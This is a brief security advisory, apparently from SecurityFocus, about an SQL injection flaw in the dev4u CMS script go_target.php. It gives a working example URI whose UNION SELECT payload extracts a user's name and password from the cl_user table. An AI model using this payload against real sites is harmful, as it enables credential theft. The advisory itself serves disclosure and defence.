dev4u 'go_target.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/dev4u/go_target.php?go_target=texte&kontent_id=9999999'+union+select+1,2,3,4,5,6,7,8,concat(user_name,0x3a,passwort),10,11,12,13,14,15,16+from+cl_user+where+user_id=1--+&v=print


 

Privacy Statement
Copyright 2010, SecurityFocus